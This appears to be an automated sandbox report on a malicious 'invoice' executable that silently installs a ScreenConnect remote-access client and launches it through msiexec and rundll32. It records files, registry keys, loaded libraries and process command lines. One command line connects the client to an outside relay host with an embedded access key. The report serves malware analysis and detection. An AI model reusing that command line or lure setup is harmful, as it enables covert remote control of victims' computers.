                              Source: rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1363549444.0000000004ACE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363773395.00000000049C3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1363549444.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: invoice-benefits-agency9-24-2024.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1453273212.00000000027DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://choicebenefitsagency.com
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2594997092.0000000001E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://choicebenefitsagency.comLR_q
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: initial sampleStatic PE information: Filename: invoice-benefits-agency9-24-2024.exe
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_050E0040 CreateProcessAsUserW,8_2_050E0040
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d26dc.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{5432CC63-8BF4-F791-1B1A-15E2F80B3217}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI299C.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29CB.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2E03.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d26de.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5d26de.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{5432CC63-8BF4-F791-1B1A-15E2F80B3217}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\c3g3oimb.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\c3g3oimb.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI29CB.tmpJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05EFF0D00_2_05EFF0D0
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05EF6F200_2_05EF6F20
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05EF60E00_2_05EF60E0
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05EF6F100_2_05EF6F10
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeCode function: 0_2_05F1039B0_2_05F1039B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_0107D5A88_2_0107D5A8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A380388_2_04A38038
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3B9C08_2_04A3B9C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3E3588_2_04A3E358
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3E3588_2_04A3E358
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_04A3B9C08_2_04A3B9C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFE7D0C69FF9_2_00007FFE7D0C69FF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7CDB112810_2_00007FFE7CDB1128
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFE7D0C6BCF10_2_00007FFE7D0C6BCF
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1363745360.0000000005A80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364607378.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364607378.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364607378.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364531689.0000000005CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1366628403.000000000615C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1366628403.000000000615C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1366628403.000000000615C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1366628403.000000000615C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1369712697.00000000084BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1361943123.00000000046DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000002.1364509957.0000000005C90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.000000000146F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exe, 00000000.00000000.1337072168.000000000146F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenamezlib.dll2 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenamewixca.dll\ vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs invoice-benefits-agency9-24-2024.exe
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.invoice-benefits-agency9-24-2024.exe.5cc0000.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.invoice-benefits-agency9-24-2024.exe.f463d8.3.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: classification engineClassification label: mal48.troj.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice-benefits-agency9-24-2024.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: invoice-benefits-agency9-24-2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: invoice-benefits-agency9-24-2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: invoice-benefits-agency9-24-2024.exeReversingLabs: Detection: 18%
                              Source: invoice-benefits-agency9-24-2024.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: invoice-benefits-agency9-24-2024.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeFile read: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe "C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe"
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC344CC8D534C153146082E5C0B08418 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8260A170A10C2A63DD060DA2E17AE0B9
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EC3C4A72C16F999398D301E804ECE99B E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "b39d397f-880b-4274-a788-d5e0ae46124e" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "2a312dd1-915e-4a70-b7fc-6da8f9a2cf4a" "System"
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BC344CC8D534C153146082E5C0B08418 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8260A170A10C2A63DD060DA2E17AE0B9Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EC3C4A72C16F999398D301E804ECE99B E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "b39d397f-880b-4274-a788-d5e0ae46124e" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "2a312dd1-915e-4a70-b7fc-6da8f9a2cf4a" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
